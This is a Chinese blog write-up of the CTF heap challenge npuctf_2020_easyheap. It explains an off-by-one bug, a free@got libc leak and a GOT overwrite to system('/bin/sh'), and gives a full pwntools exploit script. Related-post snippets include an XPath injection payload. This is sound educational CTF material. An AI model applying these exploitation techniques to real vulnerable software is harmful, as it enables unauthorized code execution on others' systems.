npuctf_2020_easyheap

最新推荐文章于 2024-05-30 11:43:13 发布
最新推荐文章于 2024-05-30 11:43:13 发布
阅读量2.7k 收藏 1
点赞数 1
分类专栏: BUU-PWN 文章标签: pwn wp python 信息安全 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0sway/article/details/122578830
版权

npuctf_2020_easyheap

使用checksec查看:
在这里插入图片描述

开启了Canary和栈不可执行,没有开启PIE。

先运行一下看看:在这里插入图片描述
OK,菜单出来了,堆题,放进IDA中分析:
在这里插入图片描述
很标准很标准的主函数,接下来一个一个模块进行分析:

create()
在这里插入图片描述

  • heaparray[i] = malloc(0x10uLL):程序在创建用户申请的chunk时,会先创建一个0x10大小的chunk
  • if ( size != 24 && size != 56 ):用户能够创建的chunk的大小已经固定死:0x180x38
  • v0 = heaparray[i]; v0[1] = malloc(size); *heaparray[i] = size;:程序自动创建的chunk存放了用户创建的chunk的size和address

edit()
在这里插入图片描述

  • read_input(heaparray[(signed int)v1][1], *heaparray[(signed int)v1] + 1LL);:off-by-one

delete()
在这里插入图片描述

  • heaparray[v1] = 0LL;:指针置0了,没啥问题

show()
在这里插入图片描述

  • printf("Size : %ld\nContent : %s\n", *heaparray[(signed int)v1], heaparray[(signed int)v1][1], v1);:从程序自动创建的chunk中定位所需要输出的内容,输出的内容是用户创建的chunk的size和内容

题目思路

  • 存在off-by-one,可以用来覆盖下一个chunk的size位置
  • 用户只能创建0x180x38size的chunk
  • name_chunk里面存了chunk的地址,目标就是这个地址
  • 修改这个地址为free@got泄露出libc
  • 计算出system@got,将free@got替换为system@got
  • 将某个chunk的内容设为/bin/sh\x00
  • 执行free(chunk)就相当于执行system('/bin/sh')

步骤解析

首先创建两个0x18大小的chunk

在这里插入图片描述

红框处存放的就是chunk1的地址,执行show()的时候,就是从该地址取值的,如果将该地址修改为free@got,执行show()的时候就会泄露出free的真实地址。

因为存在off-by-one,修改chunk0的时候可以修改到name_chunk1的size位,将这个位置修改为0x41,可以刚好覆盖到name_chunk1和chunk1

在这里插入图片描述

再将chunk1 free掉,重新申请一块0x38大小的chunk

这里用的payload是payload = b'M'*0x20 + p64(0x38) + p64(elf.got['free'])

解释下,delete()时先free的是chunk1,再free的name_chunk1,create()时先申请的是程序自动创建的chunk,所以最后如下图所示:

在这里插入图片描述

修改新chunk即可修改新chunk的name_chunk

name_chunk里存放了chunk的地址,将该地址修改为free@got进行show()操作即可泄露libc

在这里插入图片描述

得到地址后,计算出system@got将free@got覆盖为system@got

执行free即是执行system(’/bin/sh’)

完整exp

from re import A
from pwn import *

#start
# r = remote("node4.buuoj.cn",28759)
r = process("../buu/npuctf_2020_easyheap")
elf = ELF("../buu/npuctf_2020_easyheap")
libc = ELF("../buu/ubuntu18(64).so")

def add(size, content):
    r.sendlineafter("Your choice :",'1')
    r.sendlineafter("only) : ",str(size))
    r.sendlineafter("Content:",content)

def edit(idx, content):
	r.sendlineafter("Your choice :",'2')
	r.sendlineafter("Index :",str(idx))
	r.recvuntil("Content: ")
	r.send(content)


def show(idx):
    r.sendlineafter("Your choice :",'3')
    r.sendlineafter("Index :",str(idx))

def delete(idx):
	r.sendlineafter("Your choice :",'4')
	r.sendlineafter("Index :",str(idx))

add(0x18,"MMMM")
add(0x18,"MMMM")
# gdb.attach(r)

payload = b'/bin/sh\x00' + b'M'*0x10 + b'\x41'
edit(0,payload)
# gdb.attach(r)
delete(1)

payload = b'M'*0x20 + p64(0x38) + p64(elf.got['free'])
add(0x38,payload)
# gdb.attach(r)

show(1)
free_addr = u64(r.recvuntil("\x7f")[-6:].ljust(8,b'\x00'))

#libc
libc_base = free_addr - libc.symbols['free']
system_addr = libc_base + libc.symbols['system']

edit(1,p64(system_addr))
gdb.attach(r)
delete(0)

r.interactive()
m0sway
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
[NPUCTF2020]Baby Obfuscation.exe.i64
06-02
Baby Obfuscation分析过程
解读“模块的沟通”
08-04
我在写Verilog的时候,经常会用到一种方法(这一种方法是akuei2发明的)为了大家能看懂我的程序。
[BUUCTF]PWN——npuctf_2020_easyheap
mcmuyanga的博客
01-20 734
npuctf_2020_easyheap 附件 步骤: 例行检查
npuctf_2020_easyheap详解
像初雪一样自由洒落
04-25 795
off by one的题,,, 参考视频:off by one + 改got表的heap做法 例题:npuctf_2020_easyheap 程序流程 create: 申请两个chunk: 一个heaparray[i](固定0x10大小),一个是申请的大小(只能申请0x18或0x38) edit: read_input(heaparray[(signed int)v1][1], *heaparray[(signed int)v1] + 1LL); 存在off by one show:根据id.
[NPUCTF2020]验证码
feng的博客
04-02 1348
知识点 JS弱类型 JS的toString特性 正则表达式绕过 JS箭头函数利用 JS原型链 不会node.js我太菜了,要慢慢学起来。 WP 进入环境访问/source路由看到源码: const express = require('express'); const bodyParser = require('body-parser'); const cookieSession = require('cookie-session'); const fs = require('fs'); const
flash涂鸦板
12-10
简单易操作 一木了然 而且能让你快速体验到FLASH的操作乐趣 让你有想去学的冲动 而且能让你快速掌握简单操作
obfuscation
05-11
obfuscation 基于Allatori的Java代码混淆工具 使用Allatori混淆工具写的一个Maven插件 mvn install此项目,然后在想要混淆的项目的pom文件中引入此插件,并指定配置文件全路径以及要混淆的类所在路径即可使用 ...
[NPUCTF2020]ezlogin
SopRomeo的博客
06-04 1453
bp瞅瞅 发现他提交的与常见的不同 搜索一波,发现是XPATH注入 XPATH注入讲解 把文章给出的poc放上去 'or count(/)=1 or ''=' 改成2 有明显的的布尔回显(注意在重新提交的时候记得刷新下页面) 说明他根下只有一个节点 接下来是盲注了,注意他那里有个token,过期时间比较快,记得用会话保持状态带上。 测试长度 payload 'or string-length(name(/*[1]))=4 or ''=' 长度为4 猜测根节点下的名称 'or substrin.
[NPUCTF2020]EzRSA
weixin_44110537的博客
07-26 1012
encrypt from gmpy2 import lcm , powmod , invert , gcd , mpz from Crypto.Util.number import getPrime from sympy import nextprime from random import randint p = getPrime(1024) q = getPrime(1024) n = p * q gift = lcm(p - 1 , q - 1) e = 54722 flag = b'NPUCTF{*
BUUCTF [NPUCTF2020]芜湖
weixin_53349587的博客
01-09 2958
这道题是一个base64隐写,我们要先提取出所有的base加密值,然后用base隐写提取的函数,把flag提取出来,就得到了flag。 1.提取base值 本来想着用ida动调一下,应该可以提出来,结果值在堆上面,ida动调只能看到一半的base值,一点用也没有,没办法,就用pwn的pwndbg查看堆: 接下来就一直单步s运行下去,一个一个把base值提取出来,得到最终的base值: "55y85YmN6YeN5aSN55qE6aOO5pmvLG==", "5riQ5riQ5qih57OK5L
npuctf
zipry的博客
06-26 696
NPUCTF 复现 CTF WP 计算机网络 CTF 学习总结 密码学 操作系统 NPUCTF 复现 2个月前 / 0评 / 1赞 赏 码比赛的时候运维太差了,所以就想着赛后复现一下。Table of Contents[NPUCTF2020]ReadlezPHP[NPUCTF2020]ezlogin[NPUCTF2020]验证????[NPUCTF
[NPUCTF2020]ezlogin xPATH注入
qq_54929891的博客
07-01 426
xPATH
刷题记录-NPUCTF2020(web部分)
weixin_43610673的博客
05-03 4735
在buu刷了一遍,题目好顶,还剩一题EzShiro摸不出来 ReadlezPHP 禁用了右键查看源代码 view-source: 自行加上前缀即可 打开链接/time.php?source 很明显,php反序列化,通过echo b(b(b(a); 写入shell,system等被禁用,用assert(断言) <?php class HelloPhp { public $a; ...
[NPUCTF2020]这是什么觅
sm1918451478的博客
10-30 527
BUUCTF·[NPUCTF2020]这是什么觅🐎·WP
如何mysql数据导入到mongdb
codemami的博客
05-30 1233
由于MySQL和MongoDB的数据模型不同(例如,MySQL使用关系模型,而MongoDB使用文档模型),你可能需要转换数据的格式。使用MongoDB驱动程序:你也可以使用MongoDB的官方驱动程序(如Python的pymongo)来编写脚本,将数据直接插入到MongoDB中。注意:如果你的JSON文件包含多个文档,并且它们不是作为数组的一部分(即每个文档都在其自己的行上),则需要使用--jsonArray选项。手动转换:对于小型数据集,你可以手动编辑SQL或CSV文件,将其转换为JSON格式。
在linux服务器上使用tensorboard,错误记录
最新发布
wwwwzm的博客
05-30 979
1. 使用tensorboard命令时,不是从虚拟环境中找tensorboard,而是从(全局路径)中找(/home/ljx/.local/lib/python3.9/site-packages/tensorboard)是一个在 Unix-like 系统(包括 Linux 和 macOS)的命令行界面(如 Bash shell)中使用的命令。2.使用which命令, 查看使用的tensorboard的路径,发现使用的是全局路径,不是虚拟环境路径。是一个特殊的变量,它定义了操作系统搜索可执行文件的目录。
从以下代码中找到被藏起来的e,提示:在代码注释中。from Crypto.Util.number import * from gmpy2 import * from secret import flag p = getPrime(25) e = # Hidden q = getPrime(25) n = p * q m = bytes_to_long(flag.strip(b"npuctf{").strip(b"}")) c = pow(m, e, n) print(c) print(pow(2, e, n)) print(pow(4, e, n)) print(pow(8, e, n)) ''' 169169912654178 128509160179202 518818742414340 358553002064450
07-16
根据提示,在代码注释中可以找到隐藏的 `e` 值。以下是给定代码的修改版本,以显示隐藏的 `e` 值: ```python from Crypto.Util.number import * from gmpy2 import * from secret import flag p = getPrime(25) # Hidden e = 65537 q = getPrime(25) n = p * q m = bytes_to_long(flag.strip(b"npuctf{").strip(b"}")) c = pow(m, e, n) print(c) print(pow(2, e, n)) print(pow(4, e, n)) print(pow(8, e, n)) ``` 在修改后的代码中,我们将 `e` 的值设置为 65537。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值